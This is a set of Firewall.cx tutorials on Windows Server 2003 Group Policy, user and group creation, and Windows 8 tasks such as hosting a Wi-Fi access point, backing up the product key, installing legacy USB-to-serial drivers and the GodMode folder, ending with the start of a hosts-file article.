Configuring Domain Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, Local Group Policies allow the local administrator to control how all the users of a computer access the resources and features available on that computer. For example, an administrator can remove the Run command from the Start menu, ensuring that users will not find the Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

  • Registry based settings: Allows you to create a policy to administer operating system components and applications.
  • Security settings: Allows you to set security options for users and computers, restricting which files they can run based on path, hash, publisher criteria, or URL zone.
  • Software restrictions: Allows you to create a policy that restricts users from running unwanted applications and protects computers against virus and hacking attacks.
  • Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.
  • Automation of tasks using computer and User Scripts
  • Roaming user profiles: Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.
  • Internet Explorer maintenance: Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.

Configuring a Domain-Based Group Policy

Just as you used the Group Policy editor to create a local computer policy, to create a domain-based group policy you need to use the Active Directory Users and Computers snap-in, from where you can access the domain's Group Policy settings (or open the GPMC, if it is installed).

Follow the steps below to create a domain-based group policy

1. Select Active Directory Users and Computers tool from the Administrative Tools.

2. Expand Active Directory Users and Computers node, as shown below.

3. Right-click the domain name and select Properties from the menu that appears:

tk-windows-gp-domain-1

The properties window of the domain appears.

4. Click the Group Policy tab.

5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown in here:

tk-windows-gp-domain-2

 

You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will select to create a new policy instead. Click New to create a new group policy or group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:

tk-windows-gp-domain-3

 

Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:

tk-windows-gp-domain-4

 

In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the settings will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.

tk-windows-gp-domain-5

When done, click on OK to save the new setting.

Similarly, you can configure other settings for the policy. After setting all the desired options, close the Group Policy Object Editor. Your new group policy will take effect at the next Group Policy refresh; see below for how to force this immediately.
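To apply and inspect the policy immediately on a Windows XP or Windows Server 2003 client while testing, you can typically run the following from a command prompt on that machine:

C:\> gpupdate /force
C:\> gpresult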

Article Summary

Domain Group Policies give the administrator great control over the domain's users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organizational unit, group or user in Active Directory, or selectively to the areas you need. This article showed you how to create a domain group policy that can then be applied as required.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.


About the writers

GFI Software provides the single best source of network security, content security and messaging software for small to medium sized businesses.

Alan Drury is member of the Firewall.cx team and senior engineer at a large multinational company, supporting complex large Windows networks.

Chris Partsenidis is a CCNA certified Engineer, MCP, LCP, Founder & Senior Editor of Firewall.cx

  • Hits: 117385

Configuring Local Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to efficiently manage a group of people accessing a resource. Group policies can be used to control both the users and the computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

Group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, Local Group Policies allow the local administrator to control how all the users of a computer access the resources and features available on that computer. For example, an administrator can remove the Run command from the Start menu, ensuring that users will not find the Run command on that computer.

Domain-based Group Policies allow the domain / enterprise administrators to manage all the users and the computers of a domain / forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003 / Windows XP. A default group policy already exists. You only need to modify the values of different policy settings according to your specific requirements. You can create new group policies to meet your specific business requirements. Group policies allow you to implement:

Registry based settings: Allows you to create a policy to administer operating system components and applications.

Security settings: Allows you to set security options for users and computers, restricting which files they can run based on path, hash, publisher criteria or URL zone.

Software restrictions: Allows you to create a policy that restricts users from running unwanted applications and protects computers against virus and hacking attacks.

Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.

Roaming user profiles: Allows mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance: Allows administrators to manage the IE settings of the users' computers in a domain by setting the security zones, privacy settings and other parameters centrally with the help of group policy.

Using Local Group Policy

Local Group Policies affect only the users who log in to the local machine, whereas domain-based policies affect all the users of the domain. If you are creating domain-based policies, you can create policies at three levels: sites, domains and OUs. Keep in mind that each computer can belong to only one domain and only one site.

A Group Policy Object (GPO) is stored on a per domain basis. However, it can be associated with multiple domains, sites and OUs and a single domain, site or OU can have multiple GPOs. Besides this, any domain, site or OU can be associated with any GPO across domains.

When a GPO is defined it is inherited by all the objects under it and is applied in a cumulative fashion successively starting from local computer to site, domain and each nested OU. For example if a GPO is created at domain level then it will affect all the domain members and all the OUs beneath it.

After applying all the policies in hierarchy, the end result of the policy that takes effect on a user or a computer is called the Resultant Set of Policy (RSoP).

To use GPOs with greater precision, you can apply Windows Management Instrumentation (WMI) filters and Discretionary Access Control List (DACL) permissions. The WMI filters allow you to apply GPOs only to specific computers that meet a specific condition. For example, you can apply a GPO to all the computers that have more than 500 MB of free disk space. The DACL permissions allow you to apply GPOs based on the user's membership in security groups.

Windows Server 2003 provides a GPMC (Group Policy Management Console) that allows you to manage group policy implementations centrally. It provides a unified view of local computer, sites, domains and OUs (organizational units). You can have the following tools in a single console:

  • Active Directory Users and Computers
  • Active Directory Sites and Services
  • Resultant Set of Policy MMC snap-in
  • ACL Editor
  • Delegation Wizard

The screenshot below shows four tools in a single console.

tk-windows-gp-local-1

 

A group policy can be configured for computers or users or both, as shown here:

tk-windows-gp-local-2

The Group Policy editor can be run using the gpedit.msc command.

Both the policies are applied at the periodic refresh of Group Policies and can be used to specify the desktop settings, operating system behavior, user logon and logoff scripts, application settings, security settings, assigned and published applications options and folder redirection options.

Computer-related policies are applied when the computer is rebooted and User-related policies are applied when users log on to the computer.
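If you do not want to wait for a reboot or a logoff/logon while testing, the two halves of a policy can be refreshed individually from a command prompt on Windows XP or Windows Server 2003:

C:\> gpupdate /target:computer /force
C:\> gpupdate /target:user /force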

Configuring a Local Group Policy

To configure a local group policy, you need to access the group policy editor. You can use Group Policy Editor by logging in as a local administrator from any member server of a domain or a workgroup server but not from a domain controller.

Sometimes this tool, or other Active Directory tools that you need to manage group policy, does not appear in Administrative Tools. In that case you need to follow the steps given below to add the Group Policy Object Editor snap-in to a console.

1. Click Start->Run and type mmc. The Console window appears, as shown below:

2. Select Add/remove Snap-in from the File menu. 

tk-windows-gp-local-3

 

The Add/Remove Snap-in window appears, as shown below:

3. Click Add.

4. The Add Standalone Snap-in window appears.

5. Select Group Policy Object Editor snap-in from the list.

6. Click Add and then click OK in Add/remove Snap-in window.

tk-windows-gp-local-4

 

The Select Group Policy Object window appears, as shown below:

7. Keep the default value of “Local Computer”.

8. Click Finish.

tk-windows-gp-local-5

 

The Local Computer Policy MMC appears, as shown below.

You can now set the Computer Configuration or User Configuration policies as desired. This example takes User Configuration setting.

9. Expand User Configuration node:

tk-windows-gp-local-6

 

10. Expand Administrative Templates and then select the Start Menu and Taskbar node, as shown below.

11. Double-click the settings for the policy that you want to modify from the right panel. In this example double-click Remove Run Menu from Start Menu.

tk-windows-gp-local-7

 

The properties window of the setting appears as shown in the below screenshot:

12. Click Enabled to enable this setting.

tk-windows-gp-local-8

Once you click on 'OK', the local policy that you have applied will take effect and all the users who would log on to this computer will not be able to see the Run menu item of the Start menu.

This completes our Local Group Policy configuration section. The next section covers Domain Group Policies, which will help you configure and control user access throughout the Active Directory domain.

Article Summary

Group Policies are an administrator's best friend. Group Policies can control every aspect of a user's desktop, providing enhanced security measures and restricting access to specified resources. Group policies can be applied to a local server, as shown in this article, or to a whole domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

 

  • Hits: 73950

Creating Windows Users and Groups with Windows 2003

In a Windows server environment, it is very important that only authenticated users are allowed to log in for security reasons. To fulfill this requirement the creation of User accounts and Groups is essential.

User Accounts

On Windows Server 2003 computers there are two types of user accounts: local and domain user accounts. Local user accounts are created locally on a Windows Server 2003 computer to allow a user to log on to that computer. They are stored in the Security Accounts Manager (SAM) database on the local hard disk and give access to local resources on the computer.

Domain user accounts, on the other hand, are created on domain controllers and saved in Active Directory. These accounts allow you to access resources anywhere on the network. On a Windows Server 2003 computer that is a member of a domain, you need a local user account to log on locally to the computer and a domain user account to log on to the domain. Although both accounts can use the same login name and password, they are still entirely different account types.

A built-in local Administrator account is created automatically when the server is installed. A domain administrator is also a local administrator on all the member computers of the domain, because by default the Domain Admins group is added to the local Administrators group of every computer that joins the domain.

This article discusses creating local as well as domain user accounts, creating groups, and adding members to groups.

Creating a Local User Account

To create a local user account, you need to:

1. Log on as Administrator, or as a member of the local Administrators group or of the Account Operators group in the domain.

2. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in Figure 1.

tk-windows-user-groups-1

Figure 1

 

3. Click Users folder under Local Users and Groups node, as shown in Figure 2.

tk-windows-user-groups-2

Figure 2

4. Right-click Users and then click New User in the menu that appears, as shown in Figure 3:

tk-windows-user-groups-3

Figure 3

The New User dialog box appears as shown below in Figure 4.

5. Provide the User name and the Password for the user in their respective fields.

6. Select the desired password settings requirement.

Select User must change password at next logon option if you want the user to change the password when the user first logs into computer. Select User cannot change password option if you do not want the user to change the password. Select Password never expires option if you do not want the password to become obsolete after a number of days. Select Account is disabled to disable this user account.

7. Click Create , and then click Close:

tk-windows-user-groups-4

 Figure 4

The new user account will appear in the right panel of the window when you click the Users node under Local Users and Groups.

You can now associate the user to a group. To associate the user to a group, you need to:

8. Click Users folder under Local Users and Groups node.

9. Right-click the user and then select Properties from the menu that appears, as shown in Figure 5:

tk-windows-user-groups-5

 Figure 5

The Properties dialog box of the user account appears, as shown in Figure 6:

10. Click Member of tab.

The group(s) with which the user is currently associated appears.

11. Click Add.

tk-windows-user-groups-6

 Figure 6

The Select Groups dialog box appears, as shown in Figure 7.

12. Type the name of the group that you want the user to join in the Enter the object names to select field.

If the group names do not appear, you can click the Advanced button to search for them. If you want to search a different location on the network, or verify the names you have typed, click the Locations or Check Names buttons respectively.

13. Click OK .

tk-windows-user-groups-7

Figure 7

The selected group will be associated with the user and will appear in the Properties window of the user, as shown in Figure 8:

tk-windows-user-groups-8

Figure 8
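The same local user account and group membership can also be created from the command line. This is only a sketch; the user name, password and group shown are example values:

C:\> net user jsmith P@ssw0rd1 /add /fullname:"John Smith"
C:\> net localgroup "Backup Operators" jsmith /add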

Creating a Domain User Account

The process of creating a domain user account is more or less similar to the process of creating a local user account. The only differences are a few different options on the same type of screens and a few extra steps in between.

For example, you need the Active Directory Users and Computers MMC (Microsoft Management Console) snap-in to create domain user accounts instead of the Local Users and Groups MMC. Also, when you create a user in a domain, a domain is associated with the user by default; however, you can change the domain if you want.

In addition, although a domain user account can be created in the Users container, it is always better to create it in the appropriate Organizational Unit (OU).

To create a domain user account follow the steps given below:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Expand the OU in which you want to create a user, right-click the OU and select New->User from the menu that appears.

tk-windows-user-groups-9

 Figure 9

3. Alternatively, you can click on Action menu and select New->User from the menu that appears.

The New Object –User dialog box appears, as shown in Figure 10.

4. Provide the First name, Last name, and Full name in their respective fields.

5. Provide a unique logon name in User logon name field and then select a domain from the dropdown next to User logon name field if you want to change the domain name.

The domain and the user name that you have provided will appear in the User logon name (pre-Windows 2000) fields to ensure that user is allowed to log on to domain computers that are using earlier versions of Windows such as Windows NT.

tk-windows-user-groups-10

Figure 10

6. Click Next.

The second screen of New Object –User dialog box appears similar to Figure 4.

7. Provide the User name and the Password in their respective fields.

8. Select the desired password settings requirement:

Select User must change password at next logon option if you want the user to change the password when the user first logs into computer. Select User cannot change password option if you do not want the user to change the password. Select Password never expires option if you do not want the password to become obsolete after a number of days. Select Account is disabled to disable this user account.

9. Click Next.

10. Verify the user details that you had provided and click Finish on the third screen of New Object –User dialog box.

11. Follow steps 9-13 from the Creating a Local User Account section to add the user to a group. (A command-line alternative for creating domain user accounts is sketched below.)
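For completeness, here is a sketch of the command-line equivalent using the dsadd tool included with Windows Server 2003; the OU, names and password are example values only:

C:\> dsadd user "cn=John Smith,ou=Sales,dc=firewall,dc=cx" -samid jsmith -upn jsmith@firewall.cx -fn John -ln Smith -display "John Smith" -pwd P@ssw0rd1 -mustchpwd yes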

Creating Groups

Just like user accounts, groups on a Windows Server 2003 computer are of two types: built-in local groups and built-in domain groups. Examples of built-in domain groups are Account Operators, Administrators, Backup Operators, Network Configuration Operators, Performance Monitor Users, and Users. Examples of built-in local groups are Administrators, Users, Guests, and Backup Operators.

The built-in groups are created automatically when the operating system is installed or when the server becomes part of a domain. However, sometimes you need to create your own groups to meet your business requirements. Custom groups allow you to limit users' access to resources on the network as your business requires. To create a custom group in a domain, you need to:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Right-click the OU and select New->Group from the menu that appears.

The New Object – Group dialog box appears, as shown in Figure 11.

3. Provide the name of the group in the Group name field.

The group name that you have provided will appear in the Group name (pre-Windows 2000) field to ensure that group is functional on domain computers that are using earlier versions of Windows such as Windows NT.

4. Select the desired group scope of the group from the Group scope options.

If the Domain Local Scope is selected the members can come from any domain but the members can access resources only from the local domain.

If Global scope is selected then members can come only from local domain but can access resources in any domain.

If Universal scope is selected then members can come from any domain and members can access resources from any domain.

5. Select the group type from the Group Type options.

The group type can be Security or Distribution. Security groups are used to assign permissions for accessing resources, while Distribution groups are used for non-security-related tasks such as sending emails to all the group members.

tk-windows-user-groups-11

Figure 11

6. Click OK.

You can add members to a group in much the same way as you add a user to a group. Right-click the group under the Active Directory Users and Computers node in the Active Directory Users and Computers snap-in, select Properties, click the Members tab in the group's Properties window, and then follow steps 11-13 from the Creating a Local User Account section. A command-line alternative is sketched below.
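A sketch of the command-line equivalent; the group, OU and member shown are example values (-secgrp yes creates a Security group and -scope g makes it a Global group):

C:\> dsadd group "cn=Sales Managers,ou=Sales,dc=firewall,dc=cx" -secgrp yes -scope g
C:\> dsmod group "cn=Sales Managers,ou=Sales,dc=firewall,dc=cx" -addmbr "cn=John Smith,ou=Sales,dc=firewall,dc=cx"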

Article Summary

Dealing with User & Group accounts in a Windows Server environment is a very important everyday task for any Administrator. This article covered basic administration of user and group accounts at both local and domain environments.

  • Hits: 96832

How to Add and Remove Applications from Windows 8 / 8.1 Start Screen

In this article, we'll show you how to add (pin) and remove (unpin) any application from the Windows 8 or Windows 8.1 Metro Start screen. Tiles, the small squares and rectangles appearing on the Windows 8 Metro Start screen, represent different programs that you can access by either tapping or clicking on them. The Metro Start screen comes with a set of default tiles; however, users can add or remove tiles (application shortcuts) to meet their requirements. Adding tiles to the Metro Start screen is called pinning, while removing them from the Metro Start screen is called unpinning.

Pinning Apps & Programs To The Windows 8 Metro Start Screen

To pin a Windows application or a Metro App to the Start screen, you have to find it first. For this, tap/click on the Search icon and type the name of the application or the program that you wish to add.

For example, type “Paint” to search for the Windows Paint application as shown below. Once found tap/click on the Apps option:

windows-8-add-remove-application-from-start-screen-01
Figure 1. Searching for Application

Search will display the result for the Paint program, as indicated on the left of the screen. Right-click on the search result or hold your finger on it until a check mark appears beside it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-02
Figure 2. Pinning the Application on Windows 8

The panel offers two options for pinning – Pin to taskbar and Pin to Start. If you would like to see the application's icon on the taskbar of your Windows Desktop, tap/click on Pin to taskbar. For this article we want to pin it to the Metro Start screen, so tap/click on Pin to Start.

The bottom panel now disappears and you can open the application from its icon. If instead you would like to go back to the Start screen, click on the bottom left-hand corner or swipe in from the right edge of the screen and then tap/click on the Start icon. Verify that the application tile has appeared on the Metro Start screen:

windows-8-add-remove-application-from-start-screen-03 
Figure 3. Pinned Application on Windows Metro Start Screen

Unpinning Apps & Programs From The Windows 8 Metro Start Screen

To unpin an application from the Windows Metro Start screen, right-click on its tile or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-04
Figure 4. Unpin an Application from Windows Metro Start Screen

Tap/click on Unpin from Start and the icon of the selected program will vanish from the screen along with the panel.

Alternate Way To Pin Or Unpin Apps & Programs On The Windows 8 Metro Start Screen

There is another way by which you can pin/unpin most programs on the Windows 8 Metro Start screen.

Windows may not be able to find every program when you search for it. However, Windows 8 provides a very easy method for looking at all the programs available in your system in one screen. Then you can decide all those you want to pin as tiles on the Metro Start screen.

On the Metro Start screen, tap/right-click on any empty space (not covered by any tile) - a bar will appear at the bottom of the screen. Tap/click on the only icon in the bar: All apps. A new Apps screen will open up showing icons of all the apps and programs available in your computer, neatly divided into groups.

windows-8-add-remove-application-from-start-screen-05 
Figure 5. All Apps Windows 8/8.1 Screen

Right-click on any icon or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen, as in Figure 2.

Now you can choose to pin the app to the Start screen or the Task Bar. Moreover, if the app is already pinned, the panel will allow you to unpin it. Continue doing this to all the apps you want on the Start screen.
Once you are done, tap/click on the All apps icon and you will be back in the Metro Start screen along with all the application tiles you had selected.

In conclusion, this article showed how to add (pin) or remove (unpin) tiles, the small squares and rectangles appearing on the Windows 8 Metro Start screen, to suit your requirements. More articles on Windows 8 & Windows 8.1 can be found in our Windows Workstation section.

  • Hits: 13934

Configure Windows 8 & 8.1 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point

windows-8-secure-access-point-1-preWindows 8 and Windows 8.1 (including Professional edition) operating systems provide the ability to turn your workstation or laptop into a secure wireless access point, allowing wireless clients (including mobile devices) to connect to the local network or Internet. This feature can save you time, money and frustration when there is need to connect wireless devices to the network or Internet but there is no access point available.

In addition, using the method described below, you can turn your Windows system into a portable 3G router by connecting your workstation to your 3G provider (using your USB HSUPA/GPRS stick).

Windows 7 users can visit our article Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

To begin, open your Network Connections window by pressing Windows Key + R combination to bring up the Run window, and type ncpa.cpl and click OK:

windows-8-secure-access-point-1
Figure 1. Run Command – Network Connections

The Network Connection window will appear, displaying all network adapters the system currently has installed:

windows-8-secure-access-point-2
Figure 2. Network Connections

Let’s now create our new wireless virtual adapter that will be used as an access point for our wireless clients. To do this, open an elevated Command Prompt (cmd) by right-clicking on the Windows 8 Start button located in the lower left corner of the desktop and selecting Command Prompt (Admin). If prompted by the User Account Control protection, simply click on Yes to proceed:

windows-8-secure-access-point-3
Figure 3. Opening an elevated Command Prompt

Once the command prompt is open, enter the following command to create the wireless network (SSID). The encryption used by default is WPA2-PSK/AES:

C:\windows\system32> netsh wlan set hostednetwork mode=allow ssid=Firewall.cx key=$connect$here

When the command is entered, the system will return the following information:

The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.
In our example, the Wi-Fi (SSID) is named Firewall.cx and has a password of $connect$here.
 
The system information above confirms the creation of the wireless network and creates our virtual adapter which will be visible in the Network Connection window after the virtual adapter is enabled with the following command:

C:\windows\system32> netsh wlan start hostednetwork

Again, the system will confirm the wireless network has started with the below message:

The hosted network started.

Looking at the Network Connection window we’ll find our new adapter labeled as Local Area Connection 4. Right under the adapter is the SSID name of the wireless network created by the previous command:

windows-8-secure-access-point-4
Figure 4. Network Connections – Our new adapter appears

At this point, our new wireless network (Firewall.cx) should be visible to all nearby wireless clients.

Next, we need to enable Internet sharing on the network adapter that has Internet access. In our case this is the Ethernet adapter. Users accessing the Internet via their mobile broadband adapter should select their broadband adapter instead.

To enable Internet sharing, right-click on the Ethernet network adapter and select properties from the context menu, as shown below:

windows-8-secure-access-point-5Figure 5. Network Connections – Ethernet Adapter Properties

Once the Ethernet adapter properties window appears, select the Sharing tab and tick the Allow other network users to connect through this computer’s Internet connection then select the newly created virtual adapter labelled Local Area Connection 4:

windows-8-secure-access-point-6Figure 6. Enabling sharing and selecting the newly created virtual adapter

Be sure to untick the second option below (not clearly visible in above screenshot): Allow other network users to control or disable the shared Internet connection, then click on OK.

Notice our Ethernet adapter now has the word Shared in its description field:

windows-8-secure-access-point-7
Figure 7. Our Ethernet adapter now appears to be shared

At this point, clients that have successfully connected to our wireless SSID Firewall.cx should have Internet access.

Note that in some cases, it might be required to perform a quick restart of the operating system before wireless clients have Internet access. Remember that in case of a system restart, it is necessary to enter all command prompt commands again.

The command below will help verify the wireless clients connected to our Windows 8 access point:

C:\windows\system32> netsh wlan show hostednetwork
windows-8-secure-access-point-8
Figure 8. Information on our Windows 8 access point

As shown above, we have one wireless client connected to our Windows 8 access point. Windows 8 will support up to 100 wireless clients, even though that number is extremely unlikely ever to be reached.
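When the access point is no longer needed you can stop it, and you can also verify in advance whether your wireless adapter's driver supports this feature (look for the “Hosted network supported: Yes” line in the output of the second command):

C:\windows\system32> netsh wlan stop hostednetwork
C:\windows\system32> netsh wlan show drivers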

This article showed how to turn your Windows 8 & Windows 8.1 operating system into a wireless access point, allowing wireless clients to connect to the Internet or Local LAN.

  • Hits: 22985

Revealing & Backing Up Your Windows 8 – Windows 8.1 Pro License Product Key

windows-8-backup-license-product-key-1aBacking up your Windows License Product Key is essential for reinstalling your Windows 8 or Windows 8.1 operating system. In some cases, the Genuine Microsoft Label or Certificate of Authenticity (COA) containing the product key is placed in an area not easily accessible by users, e.g. inside the battery compartment of newer ultrabooks/laptops, making it difficult to note down the product key.

In this article, we’ll show you how to easily download and store your Windows License Product Key inside a text file with just two clicks!

The information displayed under the System Information page in Windows 8 and Windows 8.1 (including professional editions), includes the Windows edition, system hardware (CPU, RAM), Computer name and Windows activation status. The Windows activation status section shows us if the product is activated or not, along with the Product ID:

windows-8-backup-license-product-key-1

Figure 1. System Information does not show the Product Key

Product Keys and Product IDs are two completely different things, despite the similarity of the terms.

The 20-character Product ID is generated during the installation process and is used to obtain/qualify for technical support from Microsoft; it cannot be used to install or activate Windows.

To reveal your Product Key, which is the 25-character key actually used during the installation process, simply download and execute the script provided on the second page of our Administrative Utilities Download section.

Once you have downloaded and unzipped the file, double-click on the Windows Key.vbs file to execute the script. Once executed, a popup window will display your Product Name, Product ID and hidden Product Key:

windows-8-backup-license-product-key-2Figure 2. Running the script reveals our Product Key

At this point, you can save the displayed information by clicking on the ‘Yes’ button. This will create a text file with the name “Windows Product Key.txt” and save it in the same location from where the script was executed:

windows-8-backup-license-product-key-3Figure 3. Saving your Windows information to a text file

We should note that every time the script is executed and we select to save the information, it will overwrite the contents of the previous text file. This is important in case you decide to update your Windows with a new product key e.g moving from Windows 8.1 to Windows 8.1 Professional. In this case it would be advisable to rename the previously produced text file before executing the script and saving its information.
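On newer systems where the manufacturer embeds the product key in the UEFI firmware, the key can also be read from an elevated command prompt using the built-in wmic utility. Note that this only returns a value when such a firmware-embedded OEM key is present:

C:\windows\system32> wmic path SoftwareLicensingService get OA3xOriginalProductKey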

This article showed how to reveal and save the Windows Product Key information of your Windows 8 and Windows 8.1 operating system. We also explained the difference between the 20 Digit Product ID, shown in the System Information window, and Product Key.

  • Hits: 25654

Installing The ‘Unsupported’ Prolific USB-to-Serial Adapter PL-2303HXA & PL-2303X on Windows 8 & 8.1

profilic-pl2303-driver-installation-windows8-1aThanks to the absence of dedicated serial ports on today’s laptops and ultrabooks, USB-to-Serial adapters are very popular amongst Cisco engineers as they are used to perform the initial configuration of a variety of Cisco equipment such as routers, Catalyst switches, wireless controllers (WLC), access points and more, via their Console port. The most common USB-to-Serial adapters in the market are based on Prolific’s PL2303 chipset.

With the arrival of Windows 8, Windows 8.1 and the upcoming Windows 10, Prolific has announced that these operating systems will not support USB-to-Serial adapters using the PL-2303HXA & PL-2303X chipsets, forcing thousands of users to buy USB-to-Serial adapters powered by the newer PL-2303HXD (HX Rev D) or PL2303TA chipset.

The truth is that the PL-2303HXA & PL-2303X chipsets are fully supported under Windows 8 and Windows 8.1, and we'll show you how to make use of that old USB-to-Serial adapter that might also hold some special sentimental value.

Make sure to download our Prolific Windows 8/8.1 x64bit Drivers from our Administrative Tools section

We took our old USB-to-Serial adapter and plugged it into our ultrabook running Windows 8.1. As expected, the operating system listed the hardware under Device Manager with an exclamation mark:

profilic-pl2303-driver-installation-windows8-1Figure 1. Prolific Adapter in Device Manager

A closer look at the properties of the USB-to-Serial adapter reveals the popular Code 10 error which means that the device fails to start:

profilic-pl2303-driver-installation-windows8-2Figure 2. Prolific Adapter Error Code 10

Getting That Good-old USB-to-Serial Adapter To Work

Assuming you've successfully downloaded and unzipped the Prolific Windows 8/8.1 x64bit drivers from our Administrative Tools section, go back to the Device Manager, right-click on the Prolific USB-to-Serial Comm Port with the exclamation mark and select Update Driver Software:

profilic-pl2303-driver-installation-windows8-3Figure 3. Updating the Drivers from Device Manager

Next, select Browse my computer for driver software from the next window:

profilic-pl2303-driver-installation-windows8-4Figure 4. Select Browse my computer for driver software

Next, browse to the folder where you’ve unzipped the provided drivers, click on the Include Subfolders option and select Let me pick from a list of device drivers on my computer:

profilic-pl2303-driver-installation-windows8-5Figure 5. Select Let me pick from a list of device drivers on my computer

Next, select the driver version 3.3.2.102 dated 24/09/2008 as shown below and click Next:

profilic-pl2303-driver-installation-windows8-6Figure 6. Install Driver version 3.3.2.102

Once complete, Windows will confirm the successful installation of our driver as shown below:

profilic-pl2303-driver-installation-windows8-7Figure 7. Driver successfully installed

Closing the window, we return back to the Device Manager where we’ll notice the exclamation mark has now disappeared and our old ‘Unsupported’ USB-to-Serial adapter is fully operational:

profilic-pl2303-driver-installation-windows8-8Figure 8. Fully operational USB-to-Serial adapter

This article showed how to successfully install your old USB-to-Serial adapter based on the Prolific PL-2303HXA & PL-2303X chipsets on the Windows 8 and Windows 8.1 operating systems. Despite the fact that Prolific clearly states these chipsets are not supported on the latest Windows versions, forcing users to purchase new adapters powered by their newer chipsets, we've proven that this is not the case and showed how to make the old Prolific USB-to-Serial adapter work with the drivers available on Firewall.cx.

 

 



  • Hits: 77370

How to Enable Master Control Panel or Enable God Mode in Windows 7, 8 & 8.1

Around 2007, an undocumented Windows feature known as God Mode was made public. It is the Windows Master Control Panel shortcut: bloggers named it All Tasks or God Mode, and it gained popularity as a way of creating a shortcut to various control settings, initially in Windows Vista. Later operating systems such as Windows 7, Windows 8 and Windows 8.1 also carry this feature. The exception is the 64-bit version of Windows Vista, where using it is known to crash Explorer.

Although not intended for use by general users, God Mode or Master Control Panel functionality in Windows is implemented by creating a base folder with a special extension. The format used is:

  <FolderDisplayName>.{<GUID>}

Here, GUID represents a valid Class ID (CLSID) that has a System.ApplicationName entry in the Windows Registry. Microsoft documents this technique as "Using File System Folders as Junction Points". FolderDisplayName can be anything - when this technique was discovered, the name GodMode coined by bloggers stuck. Among the many GUID shortcuts revealed in Windows, the CLSID {ed7ba470-8e54-465e-825c-99712043e01c} is of special interest, as the related folder points to and permits access to a large number of Windows settings and Control Panel applets.

Users can now create a control panel called GodMode that allows them easy access to almost all the administrative tasks in Windows. In fact, GodMode is so named as users have complete access to all aspects of the management of Windows at their fingertips and in one location. That makes it very convenient to configure hardware or Windows settings quickly from a single screen. You access GodMode by creating a special folder on the desktop.

Arrive at the Windows desktop by closing all the open windows. Right-click on an empty part of the desktop or hold your finger there. In the menu that comes up, tap/click on New and then on the Folder option:

windows-enable-master-control-panel-god-mode-1 Figure 1. Creating a New Folder

You will see a new folder appear on the desktop and the title of the folder will be in edit mode. Modify the title of the new folder, or rename it to:

 GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Once renamed, the icon will change as shown below:

windows-enable-master-control-panel-god-mode-2Figure 2. Create a new folder & rename it to reveal GodMode

 You must double-click/tap on the icon to open the GodMode Screen:

windows-enable-master-control-panel-god-mode-3Figure 3. The GodMode Screen

You can now proceed to tweak Windows using the list of available configuration options presented simply by scrolling through and tapping/clicking the option you want.

If you no longer need to have GodMode in your system, you can safely  delete the GodMode folder on your desktop. 
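For those who prefer the command line, the same folder can be created or removed with a single command each. The sketch below assumes the folder is placed on the current user's desktop (the %USERPROFILE%\Desktop path):

C:\> mkdir "%USERPROFILE%\Desktop\GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}"

C:\> rmdir "%USERPROFILE%\Desktop\GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}"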

This article showed how to enable GodMode on Windows Vista (32Bit only), and both 32/64 Bit versions of Windows 7, Windows 8 and Windows 8.1.

  • Hits: 19619

The Importance of Windows Hosts File - How to Use Your Hosts File on Windows Workstations and Windows Servers

This article explains how the Windows operating system makes use of the popular hosts file, where it is located for the various operating systems, and how it can be used to manipulate DNS lookups and redirect them to different IP addresses and hosts.

What Is The Domain Name System?

The Internet uses a standard domain name resolution service called the DNS or the Domain Name System. All devices on the Internet have a unique IP address, much like the postal addresses people use. On the Internet, any device wanting to connect to another can do so only by using the IP address of the remote device. To know the remote IP address, the device has first to resolve the remote domain name to its mapped IP address by using DNS.

